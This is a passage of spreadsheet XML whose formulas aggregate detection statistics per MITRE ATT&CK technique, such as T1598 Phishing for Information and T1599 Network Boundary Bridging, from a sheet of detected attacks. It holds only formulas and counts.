      <c r="BE70" s="4" t="str">
        <f t="shared" si="23"/>
        <v>346 (348)</v>
      </c>
      <c r="BF70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>80</v>
      </c>
      <c r="BG70" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="BH70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>240</v>
      </c>
      <c r="BI70" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>30</v>
      </c>
      <c r="BJ70" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>26</v>
      </c>
      <c r="BK70" s="322" t="str">
        <f t="shared" si="24"/>
        <v>26 (30)</v>
      </c>
      <c r="BL70" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>9</v>
      </c>
      <c r="BM70" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="BN70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>26</v>
      </c>
      <c r="BO70" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>497</v>
      </c>
      <c r="BP70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>489</v>
      </c>
      <c r="BQ70" s="4" t="str">
        <f t="shared" si="25"/>
        <v>489 (497)</v>
      </c>
      <c r="BR70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>9</v>
      </c>
      <c r="BS70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>13</v>
      </c>
      <c r="BT70" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>467</v>
      </c>
      <c r="BV70" s="292">
        <v>4741</v>
      </c>
      <c r="BW70" s="322">
        <v>467</v>
      </c>
      <c r="BX70" s="4" t="str">
        <f t="shared" si="26"/>
        <v>467 (4741)</v>
      </c>
      <c r="BY70" s="12">
        <v>8</v>
      </c>
      <c r="BZ70" s="13">
        <v>1</v>
      </c>
      <c r="CA70" s="394">
        <v>446</v>
      </c>
      <c r="CB70" s="288">
        <v>9482</v>
      </c>
      <c r="CC70" s="4">
        <v>913</v>
      </c>
      <c r="CD70" s="4" t="str">
        <f t="shared" si="27"/>
        <v>913 (9482)</v>
      </c>
      <c r="CE70" s="4">
        <v>8</v>
      </c>
      <c r="CF70" s="4">
        <v>5</v>
      </c>
      <c r="CG70" s="13">
        <v>1</v>
      </c>
      <c r="CH70" s="394">
        <v>446</v>
      </c>
    </row>
    <row r="71" spans="1:98" ht="15" customHeight="1">
      <c r="A71" s="4">
        <f t="shared" si="28"/>
        <v>69</v>
      </c>
      <c r="B71" s="4" t="str">
        <f>IFERROR(VLOOKUP(A71,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1598</v>
      </c>
      <c r="C71" s="4" t="str">
        <f>IFERROR(VLOOKUP(B71,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing for Information</v>
      </c>
      <c r="D71" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B71)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>59</v>
      </c>
      <c r="F71" s="286" t="str">
        <f t="shared" si="29"/>
        <v>1 (59)</v>
      </c>
      <c r="G71" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>7</v>
      </c>
      <c r="H71" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>5</v>
      </c>
      <c r="I71" s="322" t="str">
        <f t="shared" si="15"/>
        <v>5 (7)</v>
      </c>
      <c r="J71" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K71" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>4</v>
      </c>
      <c r="M71" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>9</v>
      </c>
      <c r="N71" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>9</v>
      </c>
      <c r="O71" s="322" t="str">
        <f t="shared" si="16"/>
        <v>9 (9)</v>
      </c>
      <c r="P71" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q71" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>5</v>
      </c>
      <c r="S71" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>16</v>
      </c>
      <c r="T71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>14</v>
      </c>
      <c r="U71" s="4" t="str">
        <f t="shared" si="17"/>
        <v>14 (16)</v>
      </c>
      <c r="V71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W71" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>8</v>
      </c>
      <c r="Y71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>14</v>
      </c>
      <c r="Z71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>11</v>
      </c>
      <c r="AA71" s="322" t="str">
        <f t="shared" si="18"/>
        <v>11 (14)</v>
      </c>
      <c r="AB71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC71" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>6</v>
      </c>
      <c r="AE71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>34</v>
      </c>
      <c r="AF71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>26</v>
      </c>
      <c r="AG71" s="322" t="str">
        <f t="shared" si="19"/>
        <v>26 (34)</v>
      </c>
      <c r="AH71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>10</v>
      </c>
      <c r="AI71" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>15</v>
      </c>
      <c r="AK71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>48</v>
      </c>
      <c r="AL71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>37</v>
      </c>
      <c r="AM71" s="322" t="str">
        <f t="shared" si="20"/>
        <v>37 (48)</v>
      </c>
      <c r="AN71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>16</v>
      </c>
      <c r="AO71" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>18</v>
      </c>
      <c r="AQ71" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR71" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS71" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT71" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU71" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>2</v>
      </c>
      <c r="AX71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY71" s="322" t="str">
        <f t="shared" si="22"/>
        <v>1 (2)</v>
      </c>
      <c r="AZ71" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA71" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC71" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>18</v>
      </c>
      <c r="BD71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>15</v>
      </c>
      <c r="BE71" s="4" t="str">
        <f t="shared" si="23"/>
        <v>15 (18)</v>
      </c>
      <c r="BF71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>7</v>
      </c>
      <c r="BG71" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>8</v>
      </c>
      <c r="BI71" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ71" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK71" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL71" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM71" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO71" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>64</v>
      </c>
      <c r="BP71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>64</v>
      </c>
      <c r="BQ71" s="4" t="str">
        <f t="shared" si="25"/>
        <v>64 (64)</v>
      </c>
      <c r="BR71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>7</v>
      </c>
      <c r="BT71" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU71" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>59</v>
      </c>
      <c r="BV71" s="292">
        <v>5</v>
      </c>
      <c r="BW71" s="322">
        <v>5</v>
      </c>
      <c r="BX71" s="4" t="str">
        <f t="shared" si="26"/>
        <v>5 (5)</v>
      </c>
      <c r="BY71" s="12">
        <v>2</v>
      </c>
      <c r="BZ71" s="13">
        <v>1</v>
      </c>
      <c r="CA71" s="394">
        <v>4</v>
      </c>
      <c r="CB71" s="288">
        <v>10</v>
      </c>
      <c r="CC71" s="4">
        <v>9</v>
      </c>
      <c r="CD71" s="4" t="str">
        <f t="shared" si="27"/>
        <v>9 (10)</v>
      </c>
      <c r="CE71" s="4">
        <v>2</v>
      </c>
      <c r="CF71" s="4">
        <v>1</v>
      </c>
      <c r="CG71" s="13">
        <v>1</v>
      </c>
      <c r="CH71" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="72" spans="1:98" ht="15" customHeight="1">
      <c r="A72" s="4">
        <f t="shared" si="28"/>
        <v>70</v>
      </c>
      <c r="B72" s="4" t="str">
        <f>IFERROR(VLOOKUP(A72,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1599</v>
      </c>
      <c r="C72" s="4" t="str">
        <f>IFERROR(VLOOKUP(B72,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Boundary Bridging</v>
      </c>
      <c r="D72" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B72)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>8</v>
      </c>
      <c r="F72" s="286" t="str">
        <f t="shared" si="29"/>
        <v>2 (8)</v>
      </c>
      <c r="G72" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>12</v>
      </c>
      <c r="H72" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>5</v>
      </c>
      <c r="I72" s="322" t="str">
        <f t="shared" si="15"/>
        <v>5 (12)</v>
      </c>
      <c r="J72" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>4</v>
      </c>
      <c r="K72" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>3</v>
      </c>
      <c r="M72" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N72" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O72" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P72" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q72" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S72" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>12</v>
      </c>
      <c r="T72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>5</v>
      </c>
      <c r="U72" s="4" t="str">
        <f t="shared" si="17"/>
        <v>5 (12)</v>
      </c>
      <c r="V72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="W72" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>3</v>
      </c>
      <c r="Y72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>16</v>
      </c>
      <c r="Z72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>8</v>
      </c>
      <c r="AA72" s="322" t="str">
        <f t="shared" si="18"/>
        <v>8 (16)</v>
      </c>
      <c r="AB72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="AC72" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>3</v>
      </c>
      <c r="AE72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>17</v>
      </c>
      <c r="AF72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>14</v>
      </c>
      <c r="AG72" s="322" t="str">
        <f t="shared" si="19"/>
        <v>14 (17)</v>
      </c>
      <c r="AH72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>8</v>
      </c>
      <c r="AI72" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>6</v>
      </c>
      <c r="AK72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>33</v>
      </c>
      <c r="AL72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>22</v>
      </c>
      <c r="AM72" s="322" t="str">
        <f t="shared" si="20"/>
        <v>22 (33)</v>
      </c>
      <c r="AN72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>14</v>
      </c>
      <c r="AO72" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>6</v>
      </c>
      <c r="AQ72" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR72" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS72" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT72" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU72" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV72" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>4</v>
      </c>
      <c r="AX72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY72" s="322" t="str">
        <f t="shared" si="22"/>
        <v>3 (4)</v>
      </c>
      <c r="AZ72" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA72" s="16">
